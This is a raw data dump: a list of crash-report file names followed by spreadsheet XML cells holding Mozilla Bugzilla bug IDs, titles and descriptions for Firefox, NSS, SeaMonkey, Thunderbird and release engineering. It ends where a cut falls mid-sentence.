Mar  9 21:32 bp-e1ce0ad1-ee41-11dc-8f9b-001a4bd43ed6.txt
Mar  9 21:32 bp-deb61663-ee41-11dc-8863-001a4bd43ed6.txt
Mar  9 21:32 bp-db9a3775-ee41-11dc-8e74-001a4bd43ed6.txt
Mar  9 21:32 bp-d8831f6b-ee41-11dc-94ee-001a4bd43ed6.txt
Mar  9 21:32 bp-d56c80de-ee41-11dc-bbe4-001a4bd46e84.txt
Mar  9 21:32 bp-d256d96b-ee41-11dc-bea0-001a4bd46e84.txt
Mar  9 21:32 bp-cf408bc5-ee41-11dc-b8dd-001a4bd46e84.txt
Mar  9 21:32 bp-cc29d4a3-ee41-11dc-8178-001a4bd43ed6.txt
Mar  9 21:32 bp-c912e628-ee41-11dc-a41b-001a4bd43ed6.txt
Mar  9 21:31 bp-c5fe2b3d-ee41-11dc-b7b9-001a4bd43ed6.txt
Mar  9 21:31 bp-c2e91a57-ee41-11dc-ab1b-001a4bd43ed6.txt
Mar  9 21:31 bp-bfd414d9-ee41-11dc-b04c-001a4bd43ef6.txt
Mar  9 21:31 bp-bcbd5b1c-ee41-11dc-bf6e-001a4bd43e5c.txt
Mar  9 21:31 bp-b9a7f6cf-ee41-11dc-83da-001a4bd43ed6.txt
Mar  9 21:31 bp-b6915702-ee41-11dc-956e-001a4bd43e5c.txt
Mar  9 21:31 bp-b378ada3-ee41-11dc-9afe-001a4bd43ed6.txt
Mar  9 21:31 bp-b0606133-ee41-11dc-a44d-001a4bd43ed6.txt
Mar  9 21:31 bp-ad4785d4-ee41-11dc-806e-001a4bd43ed6.txt
Mar  9 21:31 bp-aa31e394-ee41-11dc-bad2-001a4bd43ed6.txt
Mar  9 21:31 bp-a7199afa-ee41-11dc-9487-001a4bd43e5c.txt
Mar  9 21:31 bp-a40455b3-ee41-11dc-9b24-001a4bd43ed6.txt
Mar  9 21:30 bp-a0ed5357-ee41-11dc-9c6b-001a4bd43ed6.txt
Mar  9 21:30 bp-9dd73345-ee41-11dc-8bb6-001a4bd43ed6.txt
Mar  9 21:30 bp-9ac1288f-ee41-11dc-8845-001a4bd46e84.txt
Mar  9 21:30 bp-97ab55a3-ee41-11dc-ac30-001a4bd46e84.txt
Mar  9 21:30 bp-9492cdca-ee41-11dc-8bab-001a4bd43ed6.txt
Mar  9 21:30 bp-917ce3b5-ee41-11dc-8320-001a4bd43ed6.txt
Mar  9 21:30 bp-8e67eaa1-ee41-11dc-b3e4-001a4bd46e84.txt
Mar  9 21:30 bp-8b52281e-ee41-11dc-9bd3-001a4bd43ed6.txt
Mar  9 21:30 bp-883aa691-ee41-11dc-8fac-001a4bd46e84.txt
Mar  9 21:30 bp-852086e8-ee41-11dc-82e1-001a4bd43ed6.txt
Mar  9 21:30 bp-82095778-ee41-11dc-ba9c-001a4bd46e84.txt
Mar  9 21:29 bp-7ef140fa-ee41-11dc-9c87-001a4bd46e84.txt
Mar  9 21:29 bp-7bd95be6-ee41-11dc-8027-001a4bd43e5c.txt
Mar  9 21:29 bp-78c3a19e-ee41-11dc-9138-001a4bd46e84.txt
Mar  9 21:29 bp-75add8c7-ee41-11dc-ab6f-001a4bd43e5c.txt
Mar  9 21:29 bp-72964c91-ee41-11dc-a52a-001a4bd43ef6.txt
Mar  9 21:29 bp-6f8027bd-ee41-11dc-9700-001a4bd46e84.txt
Mar  9 21:29 bp-6c6b6438-ee41-11dc-9ca3-001a4bd46e84.txt
Mar  9 21:29 bp-695493fa-ee41-11dc-a7fa-001a4bd43ef6.txt
Mar  9 21:29 bp-663fece6-ee41-11dc-866f-001a4bd43ed6.txt
Mar  9 21:29 bp-632987cc-ee41-11dc-ade3-001a4bd43e5c.txt
Mar  9 21:29 bp-6013334f-ee41-11dc-b6b0-001a4bd46e84.txt
Mar  9 21:29 bp-5cfe422b-ee41-11dc-b572-001a4bd46e84.txt
Mar  9 21:28 bp-59e30559-ee41-11dc-b9b6-001a4bd46e84.txt
Mar  9 21:28 bp-56ce1be8-ee41-11dc-add4-001a4bd43ef6.txt
Mar  9 21:28 bp-53b4fb33-ee41-11dc-98cb-001a4bd46e84.txt
Mar  9 21:28 bp-50a01530-ee41-11dc-8030-001a4bd43ef6.txt
Mar  9 21:28 bp-4d8978ca-ee41-11dc-a525-001a4bd43ef6.txt
Mar  9 21:28 bp-4a726340-ee41-11dc-8608-001a4bd43ed6.txt
Mar  9 21:28 bp-47558f99-ee41-11dc-bc93-001a4bd43e5c.txt
Mar  9 21:28 bp-443e40d4-ee41-11dc-8196-001a4bd43ef6.txt
Mar  9 21:28 bp-4127795e-ee41-11dc-ac96-001a4bd43ef6.txt
Mar  9 21:28 bp-3e10e7a1-ee41-11dc-ba07-001a4bd43ef6.txt
Mar  9 21:28 bp-3af4c728-ee41-11dc-9b7c-001a4bd43ed6.txt
Mar  9 21:27 bp-37de03b0-ee41-11dc-89f5-001a4bd43e5c.txt
Mar  9 21:27 bp-34c77ac5-ee41-11dc-a5f6-001a4bd43e5c.txt
Mar  9 21:27 bp-31b12d28-ee41-11dc-b3cf-001a4bd43e5c.txt
Mar  9 21:27 bp-2e9b6463-ee41-11dc-aa91-001a4bd43e5c.txt
Mar  9 21:27 bp-2b86a50c-ee41-11dc-b67f-001a4bd43ed6.txt
Mar  9 21:27 bp-286d57d1-ee41-11dc-896f-001a4bd43ed6.txt
Mar  9 21:27 bp-2555b6fa-ee41-11dc-9c93-001a4bd43ed6.txt
Mar  9 21:27 bp-22408f0a-ee41-11dc-8628-001a4bd43ef6.txt
Mar  9 21:27 bp-1f28ac4c-ee41-11dc-91a4-001a4bd46e84.txt
Mar  9 21:27 bp-1c11f3c7-ee41-11dc-b016-001a4bd46e84.txt
Mar  9 21:27 bp-18f450ee-ee41-11dc-ba27-001a4bd43ef6.txt
Mar  9 21:27 bp-15da3626-ee41-11dc-bd89-001a4bd43ef6.txt
Mar  9 21:26 bp-12bbf978-ee41-11dc-bbe8-001a4bd46e84.txt
Mar  9 21:26 bp-0fa3112e-ee41-11dc-8c43-001a4bd43e5c.txt
Mar  9 21:26 bp-0c8b7b02-ee41-11dc-b1fd-001a4bd43ed6.txt
Mar  9 21:26 bp-0970ba02-ee41-11dc-90b2-001a4bd43ef6.txt
Mar  9 21:26 bp-0637c291-ee41-11dc-9e36-001a4bd46e84.txt
Mar  9 21:26 bp-0313a911-ee41-11dc-a960-001a4bd46e84.txt
Mar  9 21:26 bp-fff93919-ee40-11dc-8456-001a4bd43ed6.txt
Mar  9 21:26 bp-fcd4c470-ee40-11dc-9f43-001a4bd46e84.txt
Mar  9 21:26 bp-f9bbc3b8-ee40-11dc-9b79-001a4bd43ef6.txt
Mar  9 21:26 bp-f6a3f5c5-ee40-11dc-b5ca-001a4bd43e5c.txt
Mar  9 21:26 bp-f3862f75-ee40-11dc-b94e-001a4bd43ef6.txt
Mar  9 21:25 bp-f06fe4c5-ee40-11dc-8c6f-001a4bd46e84.txt
Mar  9 21:25 bp-ed579db0-ee40-11dc-8b0c-001a4bd43ef6.txt
Mar  9 21:25 bp-ea3ea254-ee40-11dc-9717-001a4bd43e5c.txt
Mar  9 21:25 bp-e7255630-ee40-11dc-8104-001a4bd46e84.txt
Mar  9 21:25 bp-e40ea8c0-ee40-11dc-b7ee-001a4bd43e5c.txt
Mar  9 21:25 bp-e0f41651-ee40-11dc-bb15-001a4bd43e5c.txt
Mar  9 21:25 bp-dd43603a-ee40-11dc-947f-001a4bd43ef6.txt
Mar  9 21:25 bp-da2a2fa1-ee40-11dc-8d96-001a4bd43ed6.txt
Mar  9 21:25 bp-d711e811-ee40-11dc-b8c2-001a4bd43e5c.txt
Mar  9 21:25 bp-d3f9be40-ee40-11dc-9124-001a4bd43ef6.txt
Mar  9 21:25 bp-d0dc4ed7-ee40-11dc-9624-001a4bd43ed6.txt
Mar  9 21:25 bp-cdc59de3-ee40-11dc-bfd9-001a4bd43ef6.txt
Mar  9 21:24 bp-caafb63a-ee40-11dc-8195-001a4bd46e84.txt
Mar  9 21:24 bp-c798d22e-ee40-11dc-ac6c-001a4bd43ef6.txt
Mar  9 21:24 bp-c481666e-ee40-11dc-838b-001a4bd43ed6.txt
Mar  9 21:24 bp-c167c1d9-ee40-11dc-af1b-001a4bd46e84.txt
Mar  9 21:24 bp-be523a0c-ee40-11dc-ab48-001a4bd46e84.txt
Mar  9 21:24 bp-bb3a44d7-ee40-11dc-a36e-001a4bd46e84.txt
Mar  9 21:24 bp-b823cb59-ee40-11dc-bb5d-001a4bd43ed6.txt
Mar  9 21:24 bp-b504ee5e-ee40-11dc-b985-001a4bd46e84.txt
Mar  9 21:24 bp-b1e854de-ee40-11dc-b333-001a4bd46e84.txt
Mar  9 21:24 bp-ae376835-ee40-11dc-baaf-001a4bd43e5c.txt
Mar  9 21:24 bp-ab1fe591-ee40-11dc-bd59-001a4bd46e84.txt
Mar  9 21:23 bp-a808563a-ee40-11dc-b60f-001a4bd46e84.txt
Mar  9 21:23 bp-a4f29aa1-ee40-11dc-a4ea-001a4bd46e84.txt
Mar  9 21:23 bp-a1dcd968-ee40-11dc-81ba-001a4bd46e84.txt
Mar  9 21:23 bp-9ec76766-ee40-11dc-8c9b-001a4bd46e84.txt
Mar  9 21:23 bp-9bb1461e-ee40-11dc-af05-001a4bd43ed6.txt
Mar  9 21:23 bp-989ae097-ee40-11dc-adea-001a4bd43e5c.txt
Mar  9 21:23 bp-95852f11-ee40-11dc-a817-001a4bd46e84.txt
Mar  9 21:23 bp-9269a466-ee40-11dc-8bd1-001a4bd43ed6.txt
Mar  9 21:23 bp-8f502657-ee40-11dc-a1c1-001a4bd43e5c.txt
Mar  9 21:23 bp-8c387070-ee40-11dc-b6e6-001a4bd43ed6.txt
Mar  9 21:23 bp-892281a1-ee40-11dc-be43-001a4bd46e84.txt
Mar  9 21:23 bp-860d0207-ee40-11dc-9bb3-001a4bd43e5c.txt
Mar  9 21:22 bp-82f48f1e-ee40-11dc-9d9e-001a4bd43ed6.txt
Mar  9 21:22 bp-7fdd85cf-ee40-11dc-961a-001a4bd43ed6.txt
Mar  9 21:22 bp-7cc6c761-ee40-11dc-acc9-001a4bd46e84.txt
Mar  9 21:22 bp-79b15e78-ee40-11dc-90f1-001a4bd46e84.txt
Mar  9 21:22 bp-769c75e1-ee40-11dc-a03d-001a4bd43e5c.txt
Mar  9 21:22 bp-73867073-ee40-11dc-a313-001a4bd46e84.txt
Mar  9 21:22 bp-70705fee-ee40-11dc-b24c-001a4bd46e84.txt
Mar  9 21:22 bp-6d5313cc-ee40-11dc-8384-001a4bd43e5c.txt
Mar  9 21:22 bp-6a3c32d9-ee40-11dc-aaa7-001a4bd43ed6.txt
Mar  9 21:22 bp-67255ef8-ee40-11dc-bc35-001a4bd43ed6.txt
Mar  9 21:22 bp-6410937a-ee40-11dc-a42f-001a4bd43ed6.txt
Mar  9 21:21 bp-60c6623a-ee40-11dc-b245-001a4bd43ef6.txt
Mar  9 21:21 bp-5db06ad4-ee40-11dc-9945-001a4bd43e5c.txt
Mar  9 21:21 bp-5a98cd82-ee40-11dc-a08a-001a4bd43e5c.txt
Mar  9 21:21 bp-577c5266-ee40-11dc-a0fa-001a4bd43e5c.txt
nuff said.</t>
  </si>
  <si>
    <t>FIREFOX-343849</t>
  </si>
  <si>
    <t>hl={moz:locale} in google plugin doesn't do the right thing</t>
  </si>
  <si>
    <t>I see no way to reliably do the hl= param and I thought we found it rather unneeded too as google plays nicely with accept_lang.
This param was introduced as part of bug 335460.
Could we just get rid of it? The locale code is in the rls key anyway if it's about tracking stuff.
We should get this in for b1 feedback for P1 locales is just going to be embarrassing I'm afraid.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-275673</t>
  </si>
  <si>
    <t>embedding/browser/cocoa should not use nsIPref</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-151465</t>
  </si>
  <si>
    <t>iiyama.nl - Scroll bar doesn't scroll</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.1a) Gecko/20020611
BuildID:    2002061104
I have seen this kind of error on more pages.  I think it is javascript related.
 The scroll bar moves but the corresponding data doesn't scroll.
Reproducible: Always
Steps to Reproduce:
1.just scroll
2.
3.
Actual Results:  nothing
Expected Results:  scrolled</t>
  </si>
  <si>
    <t>jwolhuter</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-647328</t>
  </si>
  <si>
    <t>Add nightly builds for the JaegerMonkey repo</t>
  </si>
  <si>
    <t>Please turn on nightly builds for the JaegerMonkey repo. This will help us dogfood the type inference browser.</t>
  </si>
  <si>
    <t>CORE-320746</t>
  </si>
  <si>
    <t>[mac] Use GetCurrentEventKeyModifiers() instead of GetCurrentKeyModifiers()</t>
  </si>
  <si>
    <t>Spawning from bug 311466 comment #10 (from Jonas Wallden):
According to
http://developer.apple.com/documentation/Carbon/Conceptual/Carbon_Event_Manager/
Tasks/chapter_3_section_7.html GetCurrentKeyModifiers() will read modifier keys
even if the application is in the background. This means a user switching to another app during launch may inadvertently trigger safe mode. Apple recommends calling GetCurrentEventKeyModifiers() instead.</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-408832</t>
  </si>
  <si>
    <t>top 250 affiliates not right</t>
  </si>
  <si>
    <t>Something's wrong with the top 250 affiliates at
http://newsfx.spreadfirefox.com/affiliates/top_250
it's not showing up like the top 250 at old site.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-286873</t>
  </si>
  <si>
    <t>Crash on proxy icon drag if the associated page has a null title.</t>
  </si>
  <si>
    <t>Go to a page with no title tag and attempt to drag the proxy icon on the URL
bar. Chances are you'll see a crash.
Testcase *and* easy patch forthcoming.</t>
  </si>
  <si>
    <t>NSS-291555</t>
  </si>
  <si>
    <t>certutil -R creates a CSR with ext req list even when number of exts is zero.</t>
  </si>
  <si>
    <t>This was mentioned in the description for bug 291545. The comment was
In addition it appears that CSRs created by certutil now always have an
extension request attribute even when the number of extensions is zero. Doesn't
seem correct.
We should probably produce CSRs with zero length extension request lists exactly
as we did in 9.9.5.</t>
  </si>
  <si>
    <t>CORE-150604</t>
  </si>
  <si>
    <t>digest authentication problem: Mozilla ignores the stale flag from WWW-Authenticate Response Header.</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0)
BuildID:    2002053012
Mozilla ignores the stale flag from WWW-Authenticate Response Header.
Stale is a flag indicating that the previous request from the client was
rejected because the nonce value was stale. 
If stale is TRUE (case-insensitive) 
the client may wish to simply retry the request
with a new encrypted response without reprompting the user for 
a new username and password.
(RFC2617)
But Mozilla reprompts the user in this case as well as 
when stale is FALSE or absent.
Reproducible: Always
Steps to Reproduce:
1. Set the digest authentication scheme on server
   (the implementation must response on incorrect nonce and set stale
    flag in WWW-Authenticate in this case). I use proxy server Oops
    with my modules to test.
2. After changing nonce-value on server side server responses on request based 
on stale nonce with 401 error (WWW-Authenticate with stale=TRUE)
Actual Results:  Client should simply retry the request
with a new encrypted response without reprompting the user for a
new username and password.
Expected Results:  Mozilla reprompts user for new credentials.</t>
  </si>
  <si>
    <t>shibkov</t>
  </si>
  <si>
    <t>SEAMONKEY-142711</t>
  </si>
  <si>
    <t>Default override homepage needs a trailing slash</t>
  </si>
  <si>
    <t>The proper URI is:
  http://www.mozilla.org/start/
Not:
  http://www.mozilla.org/start
Fixing this will help alleviate some server load as it avoids a redirect on
requesting the current URI.  And every little bit surely helps during a release...</t>
  </si>
  <si>
    <t>CORE-171237</t>
  </si>
  <si>
    <t>Find Backend</t>
  </si>
  <si>
    <t>Find in Page: highlighted result should be at the middle of the page (vertically centered) instead of last line/bottom of page</t>
  </si>
  <si>
    <t>One the the biggest practical annoyances with the otherwise wonderful type ahead
find is that when the next occurance of a searchterm is found it's located on
the very last line visible in the window. Particularly when searching through
all text (instead of just through links) chance are you will want to read on for
at least one or two more lines to see if this occurance is really relevant for
what you're looking for or if you want to hit F3.
I don't think the occurance should appear anywhere near the middle of the
screen as then spotting the selected text isn't as instantanious as it is now
but I do think it would be good if the view could move on at least a few lines.</t>
  </si>
  <si>
    <t>FIREFOX-507073</t>
  </si>
  <si>
    <t>Don't build nsBrowserDirectoryProvider as a separate library</t>
  </si>
  <si>
    <t>Created attachment 391261
WIP</t>
  </si>
  <si>
    <t>BUGZILLA-51299</t>
  </si>
  <si>
    <t>RemoveVotes email should use the 'sendmailnow' Param</t>
  </si>
  <si>
    <t>The RemoveVotes routine in globals.pl sends email immediately waiting for 
sendmail to return before continuing.  Since this could potentially be sending a 
lot of email at once this could slow things down to have to wait for it.  It 
should follow the 'sendmailnow' Param in order to queue the mail instead of 
sending it if you have that option turned off.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-492808</t>
  </si>
  <si>
    <t>Forced clobber message is misleading</t>
  </si>
  <si>
    <t>If a slave's build directory is empty and the clobber server returns a non-null value for the clobber date the current clobberer script will treat that as a trigger to force a clobber.  This results in a message Server is forcing a clobber which various other tools pick up on.
The problem is that 99% of the time the build directory has been clobbered by some other build needing space.  Also saying that the server is forcing a clobber is misleading because the build directory is already clobbered.
We should fix the clobberer script so it doesn't warn about this common case.
We should also indicate when a clobber build is occurring.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-492615</t>
  </si>
  <si>
    <t>rm / Romansh</t>
  </si>
  <si>
    <t>[rm] Firefox 3.5 protocol handler setup for Romansh</t>
  </si>
  <si>
    <t>Protocol handlers are a new feature in Firefox 3.5 that allows links like mailto:nobody@mozilla.org to be handled by a webmail application.
In order to do that the site needs to support a special API described on http://developer.mozilla.org/en/docs/Web-based_protocol_handlers.
For en-US we're currently shipping with GMail and Yahoo! Mail for mailto:  30boxes for webcal: and Mibbit for irc: urls and we're on a ongoing evangelism effort to add more. For Romansh we'd like to do that too.
First the localization team and Stas (Stas Malolepszy) will look at the market for the language and come up with a good candidates. Gion-Andri we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. Following that is a reach out by the evangelism team to try to get the vendor to support protocol handlers.
Once that happens Stas will take over in reviewing the actual implementation which will need to change the gecko.handlerService.* entries in browser/chrome/browser-region/region.properties. Please don't make changes to that file without getting a positive review by Stas or somebody else appointed by Stas/Sethb on a patch for that change upfront.</t>
  </si>
  <si>
    <t>FIREFOX-504256</t>
  </si>
  <si>
    <t>sync should observe idle service and only sync when the user is idle</t>
  </si>
  <si>
    <t>Basically we just don't want to sync in the middle of pageload.  A couple of minutes should suffice.  We sync fairly aggressively (5 minute timer) as-is I think we can simply skip cycles where the user is active.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-404484</t>
  </si>
  <si>
    <t>destructuring assignment does not work for constants</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
Build Identifier: CVS HEAD
Destructuring assignment works fine for var and let but not for const.
Reproducible: Always
Steps to Reproduce:
const [a b] = [1 2]
Actual Results:  
a and b are defined as consts whose values are undefined.
Expected Results:  
a and b are defined as consts and a == 1 and b == 2.</t>
  </si>
  <si>
    <t>mozilla.bugs</t>
  </si>
  <si>
    <t>NSS-373276</t>
  </si>
  <si>
    <t>Enhance SSL's Bypass feature to withstand failures</t>
  </si>
  <si>
    <t>Created attachment 257912
patch v1
In NSS 3.11 we added a performance feature to libSSL that enables it to 
optionally bypass the overhead of the PK11Wrap layer and the PKCS#11 module
and call directly into the basic crypto algorithm code for SOME (not all) 
operations.  In particular we always do all asymmetric (public/private key) 
algorithms in a PKCS#11 module. We never bypass PKCS#11 for those algorithms.
The performance benefits were SUBSTANTIAL.  With the bypass enabled and 
with the other performance enhancements we did NSS 3.11 is over twice as 
fast as NSS 3.10 in certain benchmarks using SSL_RSA_WITH_RC4_128_MD5 or 
SSL_RSA_WITH_RC4_128_SHA cipher suites doing over twice as many connections
per second.
We knew that this feature did not appeal to all NSS users.  Clearly this 
bypass operation is incompatible with FIPS 140 so we created an SSL socket
option to turn this feature on or off default to off.  The application must
explicitly enable this feature to use it.
The bypass is not compatible with all PKCS#11 modules and particularly not
with some FIPS 140 compliant modules that do no RSA decryption and do not
allow any keys (including derived keys) to be extracted from the module 
in the clear (that is unwrapped). 
As originally implemented if the application enabled the bypass feature 
but was using an incompatible PKCS#11 module (as described above) all 
full handshakes would fail.  The bypass code had no ability to recover
from a failure to get certain values from the PKCS#11 module.  It was 
unable to fall back on the original non-bypass pure PKCS#11 code base.
This RFE requests that the bypass be made able to fall back when it is used
with incompatible PKCS#11 modules.  
Accomplishing that task will make the bypass code somewhat slower and will
make it use more memory.  These effects only occur when bypass is enabled.</t>
  </si>
  <si>
    <t>FIREFOX-410663</t>
  </si>
  <si>
    <t>Block Images from xyz.com access key is chosen poorly</t>
  </si>
  <si>
    <t>Created attachment 295248
Patch (v1)
g is assigned as the access key for the Block Images from xyz.com context menu item (available by right-clicking a fully loaded image).  This choice is poor because g can't be underlined visibly not to mention that the obvious access key choice here should be B.
The attached patch implements this.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-761455</t>
  </si>
  <si>
    <t>SocialAPI</t>
  </si>
  <si>
    <t>localize manifest.js</t>
  </si>
  <si>
    <t>mixedpuppy</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-400003</t>
  </si>
  <si>
    <t>Tag BG inproduct files for production</t>
  </si>
  <si>
    <t>Please tag revision 7208 for production thanks
http://viewvc.svn.mozilla.org/vc?view=rev&amp;revision=7208</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-426227</t>
  </si>
  <si>
    <t>enable nightly updates for mozilla-central</t>
  </si>
  <si>
    <t>Created attachment 312767
enable snippet generation for mozilla-central
We should probably give actionmonkey updates at some point too but that will require AUS2 changes to support multiple branches at the same milestone.
This first patch just enables snippet generation on the nightly builders. I'd like to inspect snippets by hand before we start pushing them. If they look OK then we'll start sending them over to aus2-staging.</t>
  </si>
  <si>
    <t>CORE-404380</t>
  </si>
  <si>
    <t>Crash [@ FireDelayedAccessibleEvent ]</t>
  </si>
  <si>
    <t>An inexplicable crash occurs at FireDelayedAccessibleEvent:
http://crash-stats.mozilla.com/?do_query=1&amp;query_search=signature&amp;query_type=contains&amp;query=FireDelayedAccessibleEvent&amp;date=&amp;range_value=2&amp;range_unit=months
It's crashing here right after a null check on |accessibleEvent| -- which would seem to mean the event queue has invalid pointers in there. That's odd since there are ref counted:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/accessible/src/base/nsDocAccessible.cpp&amp;rev=1.199&amp;mark=1515#1515
Most of the crashes occur when a page is loading and the doc is setting the caret to the top. We could avoid firing that event (might be helpful for perf anyway) but it doesn't really fix the root problem.
Looking for advice on this one.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-190100</t>
  </si>
  <si>
    <t>unable to access a canadian secure site dreaded IE 6 works fine!</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.0.2) Gecko/20021120 Netscape/7.01
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.0.2) Gecko/20021120 Netscape/7.01
When selecting 'how do I order' from main memu &amp; go past the dislaimer page
you get transfered to the canadian RX drug site we USA railroaders use
to order prescription drugs. This fails with 'you do not have permission to
access this site directly'. The 'check drug prices' &amp; 'get refills here' also fail.
Web master is: Bill Lee @ Bill@railwayrxassist.com I've worked with him to get
this to work on 4.79 7.0 &amp; 7.01 all of which fail. You can contact him
directly or through me if you wish.
Reproducible: Always
Steps to Reproduce:
1.go to railwayrxassist.com
2.select how do I order
3.select'new' patient
4.skip unit &amp; location and click 'here to continue'
5. scroll down through disclaimer &amp; click I agree
6. you're automatically transfered to the secure site at 'Total care Pharmacy'
in canada which fails. I guess something isn't being passed or the secure
sever has problems with Mozilla..  
Actual Results:  
Secure server disallows access.
Expected Results:  
Displayed a secure enrollment form that will allow the user to order
prescriptions from our Railroad web portal in Texas (frontend) linked to Total
Care Pharmacy's secure sever in Canada.
I did a survey of 962 railroad retirees of which 49% use one form or another
of Netcape's browser from 4.79 to 7.01 all of which fail identically thereby
forcing us to use the dreaded and loathed IE 6 to order our medications. We'd
really appreciate a fix - I'm more than willing to spend the time testing as I 
have an IT background and have loads of time.....</t>
  </si>
  <si>
    <t>mcgett</t>
  </si>
  <si>
    <t>SEAMONKEY-208978</t>
  </si>
  <si>
    <t>proxy icon inactive when loaded in new tab active after reload</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/20030610
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/20030610
if you load a link in a new tab it gets an generic inactive page proxy icon
which cannot be dragged to a bookmarks folder. After reload the icon gets
active is replaced by a page specific icon if available and can be dragged to
bookmark the page.
Reproducible: Always
Steps to Reproduce:
1.open test URL in new window (right click)
2.open test URL in new tab (right click)
3.compare icons in location bar then reload 
Actual Results:  
1. page loaded page icon visible draggable to bookmarks
2. page loaded generic icon inactive not draggable
3. after reload new tab page proxy icon active.
Expected Results:  
no difference if I load in existing or new tab
no difference if I load in tab or window.
page proxy icon getting active after 1st load not only after reload.
Found this bug when I loaded bugs from todays buglist in new tabs.
Bug seen in 1.4 and todays trunk nightly
Bug 208907 related?</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD-515431</t>
  </si>
  <si>
    <t>[mozmill] Location Bar Search</t>
  </si>
  <si>
    <t>Created attachment 399515
test case for Litmus ID 8082
https://litmus.mozilla.org/show_test.cgi?id=8082</t>
  </si>
  <si>
    <t>FIREFOX-804745</t>
  </si>
  <si>
    <t>Add info bar notification for Firefox Health Report</t>
  </si>
  <si>
    <t>We need to add an info bar to Firefox to notify users about data collection practices for Firefox Health Report.
Product Requirements:
* Info bar is displayed on every tab on every window
* Info bar is displayed until user action is taken.
* Info bar does not need to persist across application restarts
Exact content of info bar is TBD (probably by Privacy Tom). I'd like to land this ASAP so we get it out of the way and so l10n folks can have a go at it.</t>
  </si>
  <si>
    <t>gps</t>
  </si>
  <si>
    <t>CORE-165877</t>
  </si>
  <si>
    <t>ns[C]String::ToFloat broken. Will never report bad number.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1b) Gecko/20020317
Build Identifier: 
nsString::ToFloat is broken. It will never report a bad number. See this part of
function:
  if (*cp != 0) {
    *aErrorCode = (PRInt32) NS_ERROR_ILLEGAL_VALUE
  }
  *aErrorCode = (PRInt32) NS_OK
  return f
obviously aErrorCode is always NS_OK.
I looked at from a performace view though. Why are we using our own PR_strtod
anyway?
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>FIREFOX-517704</t>
  </si>
  <si>
    <t>use gBrowser instead of getBrowser() in Places</t>
  </si>
  <si>
    <t>Created attachment 401644
patch
getBrowser() is deprecated and exists only for extension compatibility.</t>
  </si>
  <si>
    <t>THUNDERBIRD-393312</t>
  </si>
  <si>
    <t>Fork tabbrowser code into Thunderbird</t>
  </si>
  <si>
    <t>If I'm reading Bug 339964 correctly our tabs code is going to be unhappy with tomorrow's build since we're depending on a bunch of tab code that just got moved to browser. We'll probably have to fork that code in to thunderbird too.</t>
  </si>
  <si>
    <t>SEAMONKEY-273201</t>
  </si>
  <si>
    <t>Move Help glossary from toolkit into app-specific code</t>
  </si>
  <si>
    <t>The glossary format used now is not extensible.  It's flat HTML that just
doesn't work when it comes to having things added to it.  We need something
else maybe RDF-based or somesuch that is extensible.
Currently the glossary wouldn't work well cross-app because it has
Firefox-specific stuff in it so we need to do this so we can have a Firefox
glossary file and a Help on Help glossary.  Otherwise Thunderbird Help will
contain quite a bit of irrelevant information...</t>
  </si>
  <si>
    <t>SEAMONKEY-131493</t>
  </si>
  <si>
    <t>The link could not be saved. The web page may have been removed or had its name changed.</t>
  </si>
  <si>
    <t>Links that used to work with 0.9.7 now fail with 0.9.9 giving an error popup
window when using SHIFT-LEFTCLICK to try to save a linked file.
The popup window says The link could not be saved. The web page might have been
removed or had its name changed.
Sample HTML from (internal site sorry) included.  A direct click on the link
works pulling down and playing the file (mp3) with mpg123.  But
SHIFT-LEFTCLICK just pops up the message.
This used to work.
I'll attach the sample html shortly.</t>
  </si>
  <si>
    <t>mlord</t>
  </si>
  <si>
    <t>CALENDAR-355295</t>
  </si>
  <si>
    <t>Upload Lightning 0.3 release notes</t>
  </si>
  <si>
    <t>Sister bug to bug 355294.
Create and upload Lightning's release notes.</t>
  </si>
  <si>
    <t>CORE-545602</t>
  </si>
  <si>
    <t>Unify the event listeners for editor</t>
  </si>
  <si>
    <t>Created attachment 426467
Patch v1.0
Currently we have 6 event listeners for an editor.
http://mxr.mozilla.org/mozilla-central/source/editor/libeditor/text/nsEditorEventListeners.h
I think this is waste. Their instances need 120 byte. If we unify them to one class it becomes 44byte. And nsEditor needs to store only one pointer. So 20byte can be reduced on every nsEditor.</t>
  </si>
  <si>
    <t>SEAMONKEY-148726</t>
  </si>
  <si>
    <t>White line in Modern urlbar</t>
  </si>
  <si>
    <t>There's a small white line running the entire length of the Modern urlbar.</t>
  </si>
  <si>
    <t>stdowa+bugzilla</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-343931</t>
  </si>
  <si>
    <t>Set app name in InfoPlist.strings during build based on --enable-official-branding</t>
  </si>
  <si>
    <t>have a branded version of InfoPlist.strings under other-licenses
suggested by robert.
when you have --enable-official-branding on mac we should override dist/Firefox.app/Contents/Resources/English.lproj/InfoPlist.strings (which normally comes from 
